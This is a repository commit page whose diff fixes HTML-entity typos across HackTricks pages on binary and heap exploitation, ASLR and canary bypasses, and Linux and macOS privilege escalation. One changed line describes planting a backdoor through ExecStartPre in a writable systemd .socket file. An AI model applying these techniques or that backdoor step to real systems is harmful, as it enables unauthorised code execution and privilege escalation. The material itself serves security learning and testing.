maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

more migration typos

Browse Source
This commit is contained in:
Carlos Polop 2025-01-05 21:30:07 +01:00
parent b1e3ef77e5
commit 972d01bc6b
89 changed files with 171 additions and 171 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

26
src/binary-exploitation/arbitrary-write-2-exec/aw2exec-__malloc_hook.md
View File

@ -34,15 +34,15 @@ gef➤ p &__free_hook
[In the post](https://guyinatuxedo.github.io/41-house_of_force/bkp16_cookbook/index.html) you can find a step by step guide on how to locate the address of the free hook without symbols. As summary, in the free function:
<pre class="language-armasm"><code class="lang-armasm">gef➤ x/20i free
0xf75dedc0 &#x3C;free>: push ebx
0xf75dedc1 &#x3C;free+1>: call 0xf768f625
0xf75dedc6 &#x3C;free+6>: add ebx,0x14323a
0xf75dedcc &#x3C;free+12>: sub esp,0x8
0xf75dedcf &#x3C;free+15>: mov eax,DWORD PTR [ebx-0x98]
0xf75dedd5 &#x3C;free+21>: mov ecx,DWORD PTR [esp+0x10]
<strong>0xf75dedd9 &#x3C;free+25>: mov eax,DWORD PTR [eax]--- BREAK HERE
</strong>0xf75deddb &#x3C;free+27>: test eax,eax ;&#x3C;
0xf75deddd &#x3C;free+29>: jne 0xf75dee50 &#x3C;free+144>
0xf75dedc0 <free>: push ebx
0xf75dedc1 <free+1>: call 0xf768f625
0xf75dedc6 <free+6>: add ebx,0x14323a
0xf75dedcc <free+12>: sub esp,0x8
0xf75dedcf <free+15>: mov eax,DWORD PTR [ebx-0x98]
0xf75dedd5 <free+21>: mov ecx,DWORD PTR [esp+0x10]
<strong>0xf75dedd9 <free+25>: mov eax,DWORD PTR [eax]--- BREAK HERE
</strong>0xf75deddb <free+27>: test eax,eax ;<
0xf75deddd <free+29>: jne 0xf75dee50 <free+144>
</code></pre>
In the mentioned break in the previous code in `$eax` will be located the address of the free hook.
@ -50,13 +50,13 @@ In the mentioned break in the previous code in `$eax` will be located the addres
Now a **fast bin attack** is performed:
- First of all it's discovered that it's possible to work with fast **chunks of size 200** in the **`__free_hook`** location:
- <pre class="language-c"><code class="lang-c">gef➤ p &#x26;__free_hook
$1 = (void (**)(void *, const void *)) 0x7ff1e9e607a8 &#x3C;__free_hook>
- <pre class="language-c"><code class="lang-c">gef➤ p &__free_hook
$1 = (void (**)(void *, const void *)) 0x7ff1e9e607a8 <__free_hook>
gef➤ x/60gx 0x7ff1e9e607a8 - 0x59
<strong>0x7ff1e9e6074f: 0x0000000000000000 0x0000000000000200
</strong>0x7ff1e9e6075f: 0x0000000000000000 0x0000000000000000
0x7ff1e9e6076f &#x3C;list_all_lock+15>: 0x0000000000000000 0x0000000000000000
0x7ff1e9e6077f &#x3C;_IO_stdfile_2_lock+15>: 0x0000000000000000 0x0000000000000000
0x7ff1e9e6076f <list_all_lock+15>: 0x0000000000000000 0x0000000000000000
0x7ff1e9e6077f <_IO_stdfile_2_lock+15>: 0x0000000000000000 0x0000000000000000
</code></pre>
- If we manage to get a fast chunk of size 0x200 in this location, it'll be possible to overwrite a function pointer that will be executed
- For this, a new chunk of size `0xfc` is created and the merged function is called with that pointer twice, this way we obtain a pointer to a freed chunk of size `0xfc*2 = 0x1f8` in the fast bin.

2
src/binary-exploitation/arbitrary-write-2-exec/www2exec-atexit.md
View File

@ -51,7 +51,7 @@ Note how `map -> l_addr + fini_array -> d_un.d_ptr` is used to **calculate** the
There are a **couple of options**:
- Overwrite the value of `map->l_addr` to make it point to a **fake `fini_array`** with instructions to execute arbitrary code
- Overwrite `l_info[DT_FINI_ARRAY]` and `l_info[DT_FINI_ARRAYSZ]` entries (which are more or less consecutive in memory) , to make them **points to a forged `Elf64_Dyn`** structure that will make again **`array` points to a memory** zone the attacker controlled.&#x20;
- Overwrite `l_info[DT_FINI_ARRAY]` and `l_info[DT_FINI_ARRAYSZ]` entries (which are more or less consecutive in memory) , to make them **points to a forged `Elf64_Dyn`** structure that will make again **`array` points to a memory** zone the attacker controlled.
- [**This writeup**](https://github.com/nobodyisnobody/write-ups/tree/main/DanteCTF.2023/pwn/Sentence.To.Hell) overwrites `l_info[DT_FINI_ARRAY]` with the address of a controlled memory in `.bss` containing a fake `fini_array`. This fake array contains **first a** [**one gadget**](../rop-return-oriented-programing/ret2lib/one-gadget.md) **address** which will be executed and then the **difference** between in the address of this **fake array** and the v**alue of `map->l_addr`** so `*array` will point to the fake array.
- According to main post of this technique and [**this writeup**](https://activities.tjhsst.edu/csc/writeups/angstromctf-2021-wallstreet) ld.so leave a pointer on the stack that points to the binary `link_map` in ld.so. With an arbitrary write it's possible to overwrite it and make it point to a fake `fini_array` controlled by the attacker with the address to a [**one gadget**](../rop-return-oriented-programing/ret2lib/one-gadget.md) for example.

2
src/binary-exploitation/basic-stack-binary-exploitation-methodology/README.md
View File

@ -89,7 +89,7 @@ Something to take into account is that usually **just one exploitation of a vuln
- **Without** [**ASLR**](../common-binary-protections-and-bypasses/aslr/index.html) **and knowing the libc version** loaded, the **address** of `system` and `/bin/sh` are not going to change, so it's possible to use them statically.
- With [**ASLR**](../common-binary-protections-and-bypasses/aslr/index.html) **but no** [**PIE**](../common-binary-protections-and-bypasses/pie/index.html)**, knowing the libc and with the binary using the `system`** function it's possible to **`ret` to the address of system in the GOT** with the address of `'/bin/sh'` in the param (you will need to figure this out).
- With [ASLR](../common-binary-protections-and-bypasses/aslr/index.html) but no [PIE](../common-binary-protections-and-bypasses/pie/index.html), knowing the libc and **without the binary using the `system`** :
- Use [**`ret2dlresolve`**](../rop-return-oriented-programing/ret2dlresolve.md) to resolve the address of `system` and call it&#x20;
- Use [**`ret2dlresolve`**](../rop-return-oriented-programing/ret2dlresolve.md) to resolve the address of `system` and call it
- **Bypass** [**ASLR**](../common-binary-protections-and-bypasses/aslr/index.html) and calculate the address of `system` and `'/bin/sh'` in memory.
- **With** [**ASLR**](../common-binary-protections-and-bypasses/aslr/index.html) **and** [**PIE**](../common-binary-protections-and-bypasses/pie/index.html) **and not knowing the libc**: You need to:
- Bypass [**PIE**](../common-binary-protections-and-bypasses/pie/index.html)

2
src/binary-exploitation/common-binary-protections-and-bypasses/libc-protections.md
View File

@ -47,7 +47,7 @@ Pointer mangling aims to **prevent partial and full pointer overwrites in heap**
### Algorithm Overview
The formula used for mangling and demangling pointers is:&#x20;
The formula used for mangling and demangling pointers is:
**`New_Ptr = (L >> 12) XOR P`**

2
src/binary-exploitation/common-binary-protections-and-bypasses/memory-tagging-extension-mte.md
View File

@ -8,7 +8,7 @@
### **How Memory Tagging Extension Works**
MTE operates by **dividing memory into small, fixed-size blocks, with each block assigned a tag,** typically a few bits in size.&#x20;
MTE operates by **dividing memory into small, fixed-size blocks, with each block assigned a tag,** typically a few bits in size.
When a pointer is created to point to that memory, it gets the same tag. This tag is stored in the **unused bits of a memory pointer**, effectively linking the pointer to its corresponding memory block.

2
src/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/bf-forked-stack-canaries.md
View File

@ -107,7 +107,7 @@ log.info(f"The canary is: {canary}")
## Threads
Threads of the same process will also **share the same canary token**, therefore it'll be possible to **brute-forc**e a canary if the binary spawns a new thread every time an attack happens.&#x20;
Threads of the same process will also **share the same canary token**, therefore it'll be possible to **brute-forc**e a canary if the binary spawns a new thread every time an attack happens.
Moreover, a buffer **overflow in a threaded function** protected with canary could be used to **modify the master canary stored in the TLS**. This is because, it might be possible to reach the memory position where the TLS is stored (and therefore, the canary) via a **bof in the stack** of a thread.\
As a result, the mitigation is useless because the check is used with two canaries that are the same (although modified).\

2
src/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/print-stack-canary.md
View File

@ -12,7 +12,7 @@ With this info the attacker can **craft and send a new attack** knowing the cana
Obviously, this tactic is very **restricted** as the attacker needs to be able to **print** the **content** of his **payload** to **exfiltrate** the **canary** and then be able to create a new payload (in the **same program session**) and **send** the **real buffer overflow**.
**CTF examples:**&#x20;
**CTF examples:**
- [**https://guyinatuxedo.github.io/08-bof_dynamic/csawquals17_svc/index.html**](https://guyinatuxedo.github.io/08-bof_dynamic/csawquals17_svc/index.html)
- 64 bit, ASLR enabled but no PIE, the first step is to fill an overflow until the byte 0x00 of the canary to then call puts and leak it. With the canary a ROP gadget is created to call puts to leak the address of puts from the GOT and the a ROP gadget to call `system('/bin/sh')`

2
src/binary-exploitation/integer-overflow.md
View File

@ -107,7 +107,7 @@ In this example, if a user inputs a negative number, it will be interpreted as a
- Only 1B is used to store the size of the password so it's possible to overflow it and make it think it's length of 4 while it actually is 260 to bypass the length check protection
- [https://guyinatuxedo.github.io/35-integer_exploitation/puzzle/index.html](https://guyinatuxedo.github.io/35-integer_exploitation/puzzle/index.html)
- Given a couple of numbers find out using z3 a new number that multiplied by the first one will give the second one:&#x20;
- Given a couple of numbers find out using z3 a new number that multiplied by the first one will give the second one:
```
(((argv[1] * 0x1064deadbeef4601) & 0xffffffffffffffff) == 0xD1038D2E07B42569)

4
src/binary-exploitation/libc-heap/heap-memory-functions/heap-functions-security-checks.md
View File

@ -39,7 +39,7 @@ malloc-and-sysmalloc.md
- **Checks during small bin search:**
- If `victim->bk->fd != victim`:
- Error message: `malloc(): smallbin double linked list corrupted`
- **Checks during consolidate** performed for each fast bin chunk:&#x20;
- **Checks during consolidate** performed for each fast bin chunk:
- If the chunk is unaligned trigger:
- Error message: `malloc_consolidate(): unaligned fastbin chunk detected`
- If the chunk has a different size that the one it should because of the index it's in:
@ -47,7 +47,7 @@ malloc-and-sysmalloc.md
- If the previous chunk is not in use and the previous chunk has a size different of the one indicated by prev_chunk:
- Error message: `corrupted size vs. prev_size in fastbins`
- **Checks during unsorted bin search**:
- If the chunk size is weird (too small or too big):&#x20;
- If the chunk size is weird (too small or too big):
- Error message: `malloc(): invalid size (unsorted)`
- If the next chunk size is weird (too small or too big):
- Error message: `malloc(): invalid next size (unsorted)`

8
src/binary-exploitation/libc-heap/heap-memory-functions/malloc-and-sysmalloc.md
View File

@ -7,7 +7,7 @@
(No checks are explained in this summary and some case have been omitted for brevity)
1. `__libc_malloc` tries to get a chunk from the tcache, if not it calls `_int_malloc`
2. `_int_malloc` :&#x20;
2. `_int_malloc` :
1. Tries to generate the arena if there isn't any
2. If any fast bin chunk of the correct size, use it
1. Fill tcache with other fast chunks
@ -299,7 +299,7 @@ The first check is to find out if the requested size could be inside a small bin
Then, a security check is performed checking:
- &#x20;if `victim->bk->fd = victim`. To see that both chunks are correctly linked.
- if `victim->bk->fd = victim`. To see that both chunks are correctly linked.
In that case, the chunk **gets the `inuse` bit,** the doubled linked list is fixed so this chunk disappears from it (as it's going to be used), and the non main arena bit is set if needed.
@ -526,7 +526,7 @@ It's time to check the unsorted bin for a potential valid chunk to use.
#### Start
This starts with a big for look that will be traversing the unsorted bin in the `bk` direction until it arrives til the end (the arena struct) with `while ((victim = unsorted_chunks (av)->bk) != unsorted_chunks (av))`&#x20;
This starts with a big for look that will be traversing the unsorted bin in the `bk` direction until it arrives til the end (the arena struct) with `while ((victim = unsorted_chunks (av)->bk) != unsorted_chunks (av))`
Moreover, some security checks are perform every time a new chunk is considered:
@ -1249,7 +1249,7 @@ Then it also checks that:
### sysmalloc not main arena
It'll first try to **extend** the previous heap for this heap. If not possible try to **allocate a new heap** and update the pointers to be able to use it.\
Finally if that didn't work, try calling **`sysmalloc_mmap`**.&#x20;
Finally if that didn't work, try calling **`sysmalloc_mmap`**.
<details>

2
src/binary-exploitation/libc-heap/house-of-einherjar.md
View File

@ -34,7 +34,7 @@
- The house of Einherjar finishes here
- This can be continued with a fast bin attack or Tcache poisoning:
- Free `B` to add it to the fast bin / Tcache
- `B`'s `fd` is overwritten making it point to the target address abusing the `D` chunk (as it contains `B` inside)&#x20;
- `B`'s `fd` is overwritten making it point to the target address abusing the `D` chunk (as it contains `B` inside)
- Then, 2 mallocs are done and the second one is going to be **allocating the target address**
## References and other examples

2
src/binary-exploitation/libc-heap/house-of-lore.md
View File

@ -10,7 +10,7 @@
- This isn't working
- Or: [https://github.com/shellphish/how2heap/blob/master/glibc_2.39/house_of_lore.c](https://github.com/shellphish/how2heap/blob/master/glibc_2.39/house_of_lore.c)
- This isn't working even if it tries to bypass some checks getting the error: `malloc(): unaligned tcache chunk detected`
- This example is still working: [**https://guyinatuxedo.github.io/40-house_of_lore/house_lore_exp/index.html**](https://guyinatuxedo.github.io/40-house_of_lore/house_lore_exp/index.html)&#x20;
- This example is still working: [**https://guyinatuxedo.github.io/40-house_of_lore/house_lore_exp/index.html**](https://guyinatuxedo.github.io/40-house_of_lore/house_lore_exp/index.html)
### Goal

4
src/binary-exploitation/libc-heap/house-of-roman.md
View File

@ -51,8 +51,8 @@ Current heap layout:
*/
```
- &#x20;`fastbin_victim` has a `fd` pointing to `relative_offset_heap`
- &#x20;`relative_offset_heap` is an offset of distance from `fake_libc_chunk`, which contains a pointer to `main_arena + 0x68`
- `fastbin_victim` has a `fd` pointing to `relative_offset_heap`
- `relative_offset_heap` is an offset of distance from `fake_libc_chunk`, which contains a pointer to `main_arena + 0x68`
- Just changing the last byte of `fastbin_victim.fd` it's possible to make `fastbin_victim points` to `main_arena + 0x68`
For the previous actions, the attacker needs to be capable of modifying the fd pointer of `fastbin_victim`.

8
src/binary-exploitation/libc-heap/unsorted-bin-attack.md
View File

@ -50,13 +50,13 @@ Then C was deallocated, and consolidated with A+B (but B was still in used). A n
- Then, it's possible to call the edit function with the index 2 (the use after free pointer) and overwrite the `bk` pointer to point to `p64(global_max_fast-0x10)`. Then, creating a new chunk will use the previously compromised free address (0x20) will **trigger the unsorted bin attack** overwriting the `global_max_fast` which a very big value, allowing now to create chunks in fast bins.
- Now a **fast bin attack** is performed:
- First of all it's discovered that it's possible to work with fast **chunks of size 200** in the **`__free_hook`** location:
- <pre class="language-c"><code class="lang-c">gef➤ p &#x26;__free_hook
$1 = (void (**)(void *, const void *)) 0x7ff1e9e607a8 &#x3C;__free_hook>
- <pre class="language-c"><code class="lang-c">gef➤ p &__free_hook
$1 = (void (**)(void *, const void *)) 0x7ff1e9e607a8 <__free_hook>
gef➤ x/60gx 0x7ff1e9e607a8 - 0x59
<strong>0x7ff1e9e6074f: 0x0000000000000000 0x0000000000000200
</strong>0x7ff1e9e6075f: 0x0000000000000000 0x0000000000000000
0x7ff1e9e6076f &#x3C;list_all_lock+15>: 0x0000000000000000 0x0000000000000000
0x7ff1e9e6077f &#x3C;_IO_stdfile_2_lock+15>: 0x0000000000000000 0x0000000000000000
0x7ff1e9e6076f <list_all_lock+15>: 0x0000000000000000 0x0000000000000000
0x7ff1e9e6077f <_IO_stdfile_2_lock+15>: 0x0000000000000000 0x0000000000000000
</code></pre>
- If we manage to get a fast chunk of size 0x200 in this location, it'll be possible to overwrite a function pointer that will be executed
- For this, a new chunk of size `0xfc` is created and the merged function is called with that pointer twice, this way we obtain a pointer to a freed chunk of size `0xfc*2 = 0x1f8` in the fast bin.

2
src/binary-exploitation/rop-return-oriented-programing/ret2esp-ret2reg.md
View File

@ -88,7 +88,7 @@ Similarly, if we know a function returns the address where the shellcode is stor
### Example
You can find some examples here:&#x20;
You can find some examples here:
- [https://ir0nstone.gitbook.io/notes/types/stack/reliable-shellcode/ret2reg/using-ret2reg](https://ir0nstone.gitbook.io/notes/types/stack/reliable-shellcode/ret2reg/using-ret2reg)
- [https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/ret2eax.c](https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/ret2eax.c)

2
src/binary-exploitation/stack-overflow/ret2win/README.md
View File

@ -71,7 +71,7 @@ To find the address of the `win` function, you can use **gdb**, **objdump**, or
objdump -d vulnerable | grep win
```
This command will show you the assembly of the `win` function, including its starting address.&#x20;
This command will show you the assembly of the `win` function, including its starting address.
The Python script sends a carefully crafted message that, when processed by the `vulnerable_function`, overflows the buffer and overwrites the return address on the stack with the address of `win`. When `vulnerable_function` returns, instead of returning to `main` or exiting, it jumps to `win`, and the message is printed.

2
src/binary-exploitation/stack-overflow/ret2win/ret2win-arm64.md
View File

@ -8,7 +8,7 @@ Find an introduction to arm64 in:
../../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md
{{#endref}}
## Code&#x20;
## Code
```c
#include <stdio.h>

4
src/binary-exploitation/stack-overflow/stack-shellcode/stack-shellcode-arm64.md
View File

@ -8,7 +8,7 @@ Find an introduction to arm64 in:
../../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md
{{#endref}}
## Code&#x20;
## Code
```c
#include <stdio.h>
@ -31,7 +31,7 @@ Compile without pie, canary and nx:
clang -o bof bof.c -fno-stack-protector -Wno-format-security -no-pie -z execstack
```
## No ASLR & No canary - Stack Overflow&#x20;
## No ASLR & No canary - Stack Overflow
To stop ASLR execute:

2
src/generic-hacking/tunneling-and-port-forwarding.md
View File

@ -574,7 +574,7 @@ ssh -D 9050 -p 2222 -l user 127.0.0.1
## ngrok
[**ngrok**](https://ngrok.com/) **is a tool to expose solutions to Internet in one command line.**\
_&#x45;xposition URI are like:_ **UID.ngrok.io**
_Exposition URI are like:_ **UID.ngrok.io**
### Installation

4
src/generic-methodologies-and-resources/external-recon-methodology/README.md
View File

@ -196,7 +196,7 @@ You could access the **TLS certificate** of the main web page, obtain the **Orga
Check for some [domain takeover](../../pentesting-web/domain-subdomain-takeover.md#domain-takeover). Maybe some company is **using some a domain** but they **lost the ownership**. Just register it (if cheap enough) and let know the company.
If you find any **domain with an IP different** from the ones you already found in the assets discovery, you should perform a **basic vulnerability scan** (using Nessus or OpenVAS) and some [**port scan**](../pentesting-network/index.html#discovering-hosts-from-the-outside) with **nmap/masscan/shodan**. Depending on which services are running you can find in **this book some tricks to "attack" them**.\
_&#x4E;ote that sometimes the domain is hosted inside an IP that is not controlled by the client, so it's not in the scope, be careful._
_Note that sometimes the domain is hosted inside an IP that is not controlled by the client, so it's not in the scope, be careful._
## Subdomains
@ -539,7 +539,7 @@ Check for possible [**subdomain takeovers**](../../pentesting-web/domain-subdoma
If the **subdomain** is pointing to some **S3 bucket**, [**check the permissions**](../../network-services-pentesting/pentesting-web/buckets/index.html).
If you find any **subdomain with an IP different** from the ones you already found in the assets discovery, you should perform a **basic vulnerability scan** (using Nessus or OpenVAS) and some [**port scan**](../pentesting-network/index.html#discovering-hosts-from-the-outside) with **nmap/masscan/shodan**. Depending on which services are running you can find in **this book some tricks to "attack" them**.\
_&#x4E;ote that sometimes the subdomain is hosted inside an IP that is not controlled by the client, so it's not in the scope, be careful._
_Note that sometimes the subdomain is hosted inside an IP that is not controlled by the client, so it's not in the scope, be careful._
## IPs

2
src/linux-hardening/privilege-escalation/README.md
View File

@ -538,7 +538,7 @@ Sockets can be configured using `.socket` files.
### Writable .socket files
If you find a **writable** `.socket` file you can **add** at the beginning of the `[Socket]` section something like: `ExecStartPre=/home/kali/sys/backdoor` and the backdoor will be executed before the socket is created. Therefore, you will **probably need to wait until the machine is rebooted.**\
_&#x4E;ote that the system must be using that socket file configuration or the backdoor won't be executed_
_Note that the system must be using that socket file configuration or the backdoor won't be executed_
### Writable sockets

2
src/linux-hardening/privilege-escalation/docker-security/namespaces/cgroup-namespace.md
View File

@ -62,7 +62,7 @@ By ensuring that `unshare` runs with the `-f` flag, the new PID namespace is cor
docker run -ti --name ubuntu1 -v /usr:/ubuntu1 ubuntu bash
```
### &#x20;Check which namespace is your process in
### Check which namespace is your process in
```bash
ls -l /proc/self/ns/cgroup

2
src/linux-hardening/privilege-escalation/docker-security/namespaces/ipc-namespace.md
View File

@ -54,7 +54,7 @@ By ensuring that `unshare` runs with the `-f` flag, the new PID namespace is cor
docker run -ti --name ubuntu1 -v /usr:/ubuntu1 ubuntu bash
```
### &#x20;Check which namespace is your process in
### Check which namespace is your process in
```bash
ls -l /proc/self/ns/ipc

2
src/linux-hardening/privilege-escalation/docker-security/namespaces/mount-namespace.md
View File

@ -57,7 +57,7 @@ By ensuring that `unshare` runs with the `-f` flag, the new PID namespace is cor
docker run -ti --name ubuntu1 -v /usr:/ubuntu1 ubuntu bash
```
### &#x20;Check which namespace is your process in
### Check which namespace is your process in
```bash
ls -l /proc/self/ns/mnt

2
src/linux-hardening/privilege-escalation/docker-security/namespaces/network-namespace.md
View File

@ -57,7 +57,7 @@ docker run -ti --name ubuntu1 -v /usr:/ubuntu1 ubuntu bash
# Run ifconfig or ip -a
```
### &#x20;Check which namespace is your process in
### Check which namespace is your process in
```bash
ls -l /proc/self/ns/net

2
src/linux-hardening/privilege-escalation/docker-security/namespaces/pid-namespace.md
View File

@ -59,7 +59,7 @@ By mounting a new instance of the `/proc` filesystem if you use the param `--mou
docker run -ti --name ubuntu1 -v /usr:/ubuntu1 ubuntu bash
```
### &#x20;Check which namespace are your process in
### Check which namespace are your process in
```bash
ls -l /proc/self/ns/pid

2
src/linux-hardening/privilege-escalation/docker-security/namespaces/time-namespace.md
View File

@ -48,7 +48,7 @@ By ensuring that `unshare` runs with the `-f` flag, the new PID namespace is cor
docker run -ti --name ubuntu1 -v /usr:/ubuntu1 ubuntu bash
```
### &#x20;Check which namespace is your process in
### Check which namespace is your process in
```bash
ls -l /proc/self/ns/time

2
src/linux-hardening/privilege-escalation/docker-security/namespaces/user-namespace.md
View File

@ -59,7 +59,7 @@ docker run -ti --name ubuntu1 -v /usr:/ubuntu1 ubuntu bash
To use user namespace, Docker daemon needs to be started with **`--userns-remap=default`**(In ubuntu 14.04, this can be done by modifying `/etc/default/docker` and then executing `sudo service docker restart`)
### &#x20;Check which namespace is your process in
### Check which namespace is your process in
```bash
ls -l /proc/self/ns/user

2
src/linux-hardening/privilege-escalation/docker-security/namespaces/uts-namespace.md
View File

@ -54,7 +54,7 @@ By ensuring that `unshare` runs with the `-f` flag, the new PID namespace is cor
docker run -ti --name ubuntu1 -v /usr:/ubuntu1 ubuntu bash
```
### &#x20;Check which namespace is your process in
### Check which namespace is your process in
```bash
ls -l /proc/self/ns/uts

2
src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-function-hooking.md
View File

@ -6,7 +6,7 @@
Create a **dylib** with an **`__interpose`** section (or a section flagged with **`S_INTERPOSING`**) containing tuples of **function pointers** that refer to the **original** and the **replacement** functions.
Then, **inject** the dylib with **`DYLD_INSERT_LIBRARIES`** (the interposing needs occur before the main app loads). Obviously the [**restrictions** applied to the use of **`DYLD_INSERT_LIBRARIES`** applies here also](../macos-proces-abuse/macos-library-injection/index.html#check-restrictions).&#x20;
Then, **inject** the dylib with **`DYLD_INSERT_LIBRARIES`** (the interposing needs occur before the main app loads). Obviously the [**restrictions** applied to the use of **`DYLD_INSERT_LIBRARIES`** applies here also](../macos-proces-abuse/macos-library-injection/index.html#check-restrictions).
### Interpose printf

2
src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-extensions.md
View File

@ -85,7 +85,7 @@ img4tool -e kernelcache.release.iphone14 -o kernelcache.release.iphone14.e
pyimg4 im4p extract -i kernelcache.release.iphone14 -o kernelcache.release.iphone14.e
```
### Download&#x20;
### Download
- [**KernelDebugKit Github**](https://github.com/dortania/KdkSupportPkg/releases)

2
src/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/README.md
View File

@ -476,7 +476,7 @@ settings set target.x86-disassembly-flavor intel
> [!WARNING]
> Inside lldb, dump a process with `process save-core`
<table data-header-hidden><thead><tr><th width="225"></th><th></th></tr></thead><tbody><tr><td><strong>(lldb) Command</strong></td><td><strong>Description</strong></td></tr><tr><td><strong>run (r)</strong></td><td>Starting execution, which will continue unabated until a breakpoint is hit or the process terminates.</td></tr><tr><td><strong>process launch --stop-at-entry</strong></td><td>Strt execution stopping at the entry point</td></tr><tr><td><strong>continue (c)</strong></td><td>Continue execution of the debugged process.</td></tr><tr><td><strong>nexti (n / ni)</strong></td><td>Execute the next instruction. This command will skip over function calls.</td></tr><tr><td><strong>stepi (s / si)</strong></td><td>Execute the next instruction. Unlike the nexti command, this command will step into function calls.</td></tr><tr><td><strong>finish (f)</strong></td><td>Execute the rest of the instructions in the current function (“frame”) return and halt.</td></tr><tr><td><strong>control + c</strong></td><td>Pause execution. If the process has been run (r) or continued (c), this will cause the process to halt ...wherever it is currently executing.</td></tr><tr><td><strong>breakpoint (b)</strong></td><td><p><code>b main</code> #Any func called main</p><p><code>b &#x3C;binname>`main</code> #Main func of the bin</p><p><code>b set -n main --shlib &#x3C;lib_name></code> #Main func of the indicated bin</p><p><code>breakpoint set -r '\[NSFileManager .*\]$'</code> #Any NSFileManager method</p><p><code>breakpoint set -r '\[NSFileManager contentsOfDirectoryAtPath:.*\]$'</code></p><p><code>break set -r . -s libobjc.A.dylib</code> # Break in all functions of that library</p><p><code>b -a 0x0000000100004bd9</code></p><p><code>br l</code> #Breakpoint list</p><p><code>br e/dis &#x3C;num></code> #Enable/Disable breakpoint</p><p>breakpoint delete &#x3C;num></p></td></tr><tr><td><strong>help</strong></td><td><p>help breakpoint #Get help of breakpoint command</p><p>help memory write #Get help to write into the memory</p></td></tr><tr><td><strong>reg</strong></td><td><p>reg read</p><p>reg read $rax</p><p>reg read $rax --format &#x3C;<a href="https://lldb.llvm.org/use/variable.html#type-format">format</a>></p><p>reg write $rip 0x100035cc0</p></td></tr><tr><td><strong>x/s &#x3C;reg/memory address></strong></td><td>Display the memory as a null-terminated string.</td></tr><tr><td><strong>x/i &#x3C;reg/memory address></strong></td><td>Display the memory as assembly instruction.</td></tr><tr><td><strong>x/b &#x3C;reg/memory address></strong></td><td>Display the memory as byte.</td></tr><tr><td><strong>print object (po)</strong></td><td><p>This will print the object referenced by the param</p><p>po $raw</p><p><code>{</code></p><p><code>dnsChanger = {</code></p><p><code>"affiliate" = "";</code></p><p><code>"blacklist_dns" = ();</code></p><p>Note that most of Apples Objective-C APIs or methods return objects, and thus should be displayed via the “print object” (po) command. If po doesn't produce a meaningful output use <code>x/b</code></p></td></tr><tr><td><strong>memory</strong></td><td>memory read 0x000....<br>memory read $x0+0xf2a<br>memory write 0x100600000 -s 4 0x41414141 #Write AAAA in that address<br>memory write -f s $rip+0x11f+7 "AAAA" #Write AAAA in the addr</td></tr><tr><td><strong>disassembly</strong></td><td><p>dis #Disas current function</p><p>dis -n &#x3C;funcname> #Disas func</p><p>dis -n &#x3C;funcname> -b &#x3C;basename> #Disas func<br>dis -c 6 #Disas 6 lines<br>dis -c 0x100003764 -e 0x100003768 # From one add until the other<br>dis -p -c 4 # Start in current address disassembling</p></td></tr><tr><td><strong>parray</strong></td><td>parray 3 (char **)$x1 # Check array of 3 components in x1 reg</td></tr><tr><td><strong>image dump sections</strong></td><td>Print map of the current process memory</td></tr><tr><td><strong>image dump symtab &#x3C;library></strong></td><td><code>image dump symtab CoreNLP</code> #Get the address of all the symbols from CoreNLP</td></tr></tbody></table>
<table data-header-hidden><thead><tr><th width="225"></th><th></th></tr></thead><tbody><tr><td><strong>(lldb) Command</strong></td><td><strong>Description</strong></td></tr><tr><td><strong>run (r)</strong></td><td>Starting execution, which will continue unabated until a breakpoint is hit or the process terminates.</td></tr><tr><td><strong>process launch --stop-at-entry</strong></td><td>Strt execution stopping at the entry point</td></tr><tr><td><strong>continue (c)</strong></td><td>Continue execution of the debugged process.</td></tr><tr><td><strong>nexti (n / ni)</strong></td><td>Execute the next instruction. This command will skip over function calls.</td></tr><tr><td><strong>stepi (s / si)</strong></td><td>Execute the next instruction. Unlike the nexti command, this command will step into function calls.</td></tr><tr><td><strong>finish (f)</strong></td><td>Execute the rest of the instructions in the current function (“frame”) return and halt.</td></tr><tr><td><strong>control + c</strong></td><td>Pause execution. If the process has been run (r) or continued (c), this will cause the process to halt ...wherever it is currently executing.</td></tr><tr><td><strong>breakpoint (b)</strong></td><td><p><code>b main</code> #Any func called main</p><p><code>b <binname>`main</code> #Main func of the bin</p><p><code>b set -n main --shlib <lib_name></code> #Main func of the indicated bin</p><p><code>breakpoint set -r '\[NSFileManager .*\]$'</code> #Any NSFileManager method</p><p><code>breakpoint set -r '\[NSFileManager contentsOfDirectoryAtPath:.*\]$'</code></p><p><code>break set -r . -s libobjc.A.dylib</code> # Break in all functions of that library</p><p><code>b -a 0x0000000100004bd9</code></p><p><code>br l</code> #Breakpoint list</p><p><code>br e/dis <num></code> #Enable/Disable breakpoint</p><p>breakpoint delete <num></p></td></tr><tr><td><strong>help</strong></td><td><p>help breakpoint #Get help of breakpoint command</p><p>help memory write #Get help to write into the memory</p></td></tr><tr><td><strong>reg</strong></td><td><p>reg read</p><p>reg read $rax</p><p>reg read $rax --format <<a href="https://lldb.llvm.org/use/variable.html#type-format">format</a>></p><p>reg write $rip 0x100035cc0</p></td></tr><tr><td><strong>x/s <reg/memory address></strong></td><td>Display the memory as a null-terminated string.</td></tr><tr><td><strong>x/i <reg/memory address></strong></td><td>Display the memory as assembly instruction.</td></tr><tr><td><strong>x/b <reg/memory address></strong></td><td>Display the memory as byte.</td></tr><tr><td><strong>print object (po)</strong></td><td><p>This will print the object referenced by the param</p><p>po $raw</p><p><code>{</code></p><p><code>dnsChanger = {</code></p><p><code>"affiliate" = "";</code></p><p><code>"blacklist_dns" = ();</code></p><p>Note that most of Apples Objective-C APIs or methods return objects, and thus should be displayed via the “print object” (po) command. If po doesn't produce a meaningful output use <code>x/b</code></p></td></tr><tr><td><strong>memory</strong></td><td>memory read 0x000....<br>memory read 